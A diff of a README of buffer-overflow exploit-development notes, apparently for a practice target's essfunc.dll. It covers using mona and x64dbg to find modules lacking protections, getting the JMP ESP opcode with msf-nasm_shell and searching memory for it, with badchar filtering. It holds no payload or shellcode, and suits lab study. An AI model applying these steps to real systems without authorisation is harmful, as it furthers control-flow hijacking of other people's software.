marevalo10/hackfiles/BoF_Fuzzing/README.md

            !mona modules #In this case essfunc.dll is found or ERC --ModuleInfo  #using x64dbg with the ERC pluggin
-           \# Identify which modules have less protections active from the process running.
+           # Identify which modules have less protections active from the process running.
-           \# To know the op codefor JUMP ESP we can use msf-nasm\_shell.
-Run it and put JMP ESP to identify the op code msf-nasm\_shell
+           # To know the op codefor JUMP ESP we can use msf-nasm\_shell.
+Run it and put JMP ESP to identify the op code
+           msf-nasm_shell
-           \>JMP ESP
+           >JMP ESP
-           \#In other Kali is: /opt/metasploit\-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/nasm\_shell.rb
+           #In other Kali is: /opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/nasm_shell.rb
-           \#We got "FFE4"
+           #We got "FFE4"
-           \# Now we need to look for the instruction JMP ESP ("\\xff\\xe4") in the memory for any of these unprotected modules
+           # Now we need to look for the instruction JMP ESP ("\\xff\\xe4") in the memory for any of these unprotected module
+           # The easiest way is running: # !mona jmp -r esp -cpb "\x00\x0A"   #badchars
            !mona find -s "\\xff\\xe4" -m "essfunc.dll" => -s is the byte string to search for, -m specifies the module to search in
            \#9 occurrences were found.
            #In x64dbg, go to symbols (alt+e), select any of the dll or exe files by double clicking it.
 Then ctrl+f to search and jmp esp